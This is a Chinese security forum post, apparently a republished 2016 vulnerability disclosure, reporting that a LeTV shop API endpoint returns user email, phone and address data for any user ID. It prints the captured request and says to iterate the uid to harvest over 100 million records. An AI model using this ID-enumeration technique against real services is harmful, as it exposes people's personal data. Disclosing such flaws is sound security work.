HanDs
管理员

[7月漏洞公开] 乐视某处接口可获取1亿+用户数据(email/mobile/address) 



(づ ̄ 3 ̄)づ

详细说明:

测试的是乐视商城ios客户端

1.png



2.png



登录过程中抓到如下包

code 区域
GET /SdkAccount/getUserByID/uid/191851023/dlevel/total?deviceid=46688E24-6BB0-425C-AD46-34F2B333F6FE&equipID=46688E24-6BB0-425C-AD46-34F2B333F6FE&equipType=iPad_4&ip=192.168.1.152&lang=zh-cn&registService=mapp HTTP/1.1
Host: sso.letv.com
TK: 6ab8425952573179f1a63abbf9e1871a.1464513228
Accept-Encoding: gzip, deflate
Accept: */*
Cookie: PHPSESSID=5c57d3orrjqmif6ei7n1iqiu70
Accept-Language: zh-Hans-CN;q=1
Connection: close
Proxy-Connection: keep-alive
User-Agent: LetvShop/1.5.4 (iPad; iOS 9.3.2; Scale/2.00)



uid后面的数字191851023即是我的id,从1到191851023遍历即可

3.png



4.png



…………

5.png

漏洞证明:

修复方案:


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
乐视幽
#1楼
发帖时间:2016-7-14   |   查看数:0   |   回复数:0
游客组
快速回复